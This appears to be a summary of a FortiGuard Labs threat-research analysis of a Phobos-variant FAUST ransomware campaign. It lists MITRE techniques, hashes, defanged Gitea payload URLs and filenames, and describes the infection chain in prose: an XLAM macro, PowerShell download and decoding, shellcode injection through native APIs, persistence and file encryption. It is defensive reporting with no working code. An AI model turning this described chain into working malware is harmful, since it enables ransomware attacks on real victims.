Threat Research

Another Phobos Ransomware Variant Launches Attack – FAUST | FortiGuard Labs

Fortinet

FortiGuard Labs analyzed a Phobos-family campaign that uses an XLAM document with embedded VBA to launch PowerShell, download Base64-encoded payloads from a Gitea repository, and deploy the FAUST ransomware via in-memory shellcode injection. The chain includes a downloader EXE that decodes obfuscated strings, extracts an MSIL loader, injects shellcode into a spawned process, and establishes persistence. #Phobos #FAUST

Keypoints

  • Malicious XLAM document contains a VBA macro that runs PowerShell on Workbook_Open to fetch and decode payload data.
  • Payloads are hosted on Gitea as Base64-encoded files; the script extracts a targeted section with the pattern “DICK{(.*)}DICK” and decodes it to produce executable components.
  • The dropped executable “AVG update.exe” acts as a downloader/loader: it decodes its .rdata to extract an MSIL execution file (“SmartScreen Defender Windows.exe”) and retrieves additional data via curl.
  • The loader decodes Base64 shellcode and performs process injection by allocating RWE memory and using native APIs to write, protect, and create a remote thread in the target process.
  • FAUST ransomware executes, creates persistence via Run registry and startup folder copies, enumerates drives and network shares, excludes specific files/directories, and encrypts files with the “.faust” extension and a victim ID in the filename.
  • Indicators include Gitea-hosted URLs, specific filenames (e.g., AVG update.exe), and multiple file hashes; FortiGuard detections and protections are available.

MITRE Techniques

  • [T1204.002] Malicious File – VBA macro in an XLAM document initiates the attack (‘The XLAM document we discovered contains an embedded VBA script’).
  • [T1059.001] PowerShell – Macro invokes PowerShell to download and decode payload data (‘the script triggers PowerShell for the next stage using the “Workbook_Open()” function.’).
  • [T1105] Ingress Tool Transfer – Payloads are retrieved from a Gitea repository (‘downloads data from hxxps://gitea[.]com/JoinPokingo/JingaPol/raw/branch/main/cfmifs_CRPT[.]txt’).
  • [T1027] Obfuscated Files or Information – Files and strings are Base64-encoded and XOR-obfuscated before use (‘files encoded in Base64’ and ‘encodes all its strings and XORs them with specific hexadecimal keys’).
  • [T1055] Process Injection – Loader allocates RWE memory and injects shellcode using native APIs (‘ZwAllocateVirtualMemory, NtWriteVirtualMemory, NtProtectVirtualMemory, and RtlCreateUserThread’).
  • [T1547.001] Registry Run Keys / Startup Folder – Malware adds persistence via Run key and copies itself to startup folders (‘adds persistence by adding a registry to “HKCUSoftwareMicrosoftWindowsCurrentVersionRun “ and copying itself to two folders…’).
  • [T1486] Data Encrypted for Impact – FAUST encrypts files and appends the “.faust” extension, dropping ransom notes (‘appends the “.faust” extension to each encrypted file and generates info.txt and info.hta’).
  • [T1083] File and Directory Discovery – Ransomware scans logical drives, network shares, and searches for specific database/file types before encryption (‘deploying encryption, scanning logical drives, searching for network/sharing resources, scanning files individually’).

Indicators of Compromise

  • [File Hashes] Malware samples – 426284b7dedb929129687303f1bf7e4def607f404c93f7736d17241e43f0ab33, 50e2cb600471fc38c4245d596f92f5444e7e17cd21dd794ba7d547e0f2d9a9d5, and 3 more hashes.
  • [URLs / Domains] Gitea-hosted payloads – hxxps://gitea[.]com/JoinPokingo/JingaPol/raw/branch/main/cfmifs_CRPT[.]txt, hxxps://gitea[.]com/JoinPokingo/JingaPol/raw/branch/main/AppVStreamingUX_FST[.]txt.
  • [Filenames] Dropped/executed files – AVG update.exe, SmartScreen Defender Windows.exe, info.hta / info.txt (ransom notes).
  • [Email] Ransom contact – [email protected] (used in encrypted filename and ransom note).

The technical chain begins with an XLAM document embedding a VBA macro that executes on Workbook_Open to run a PowerShell script. The PowerShell fetches Base64-encoded blobs from a Gitea repo, extracts the targeted segment using the regex pattern “DICK{(.*)}DICK”, decodes the content, and writes decoded artifacts (a decoy XLSX and an executable named “AVG update.exe”) into a randomly named folder under %APPDATA%/Local.

“AVG update.exe” functions as a downloader/loader that unpacks obfuscated data (strings XORed with hex keys), decodes its .rdata to extract an MSIL execution payload saved as “SmartScreen Defender Windows.exe”, and uses cmd/curl to retrieve another Base64 blob (AppVStreamingUX_FST.txt). The loader decodes the shellcode and prepares it for in-memory execution.

The loader injects the decoded shellcode into the spawned MSIL process by allocating Read-Write-Execute memory and invoking native APIs (ZwAllocateVirtualMemory, NtWriteVirtualMemory, NtProtectVirtualMemory, RtlCreateUserThread) to write and execute the payload. The resulting FAUST payload establishes persistence via Run registry keys and startup-folder copies, enumerates drives and network shares, applies an exclusion list, encrypts target files appending an “.id[<>-3512].[[email protected]].faust” suffix, and drops ransom notes (info.hta/info.txt).

Read more: https://feeds.fortinet.com/~/865729472/0/fortinet/blog/threat-research~Another-Phobos-Ransomware-Variant-Launches-Attack-%e2%80%93-FAUST

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint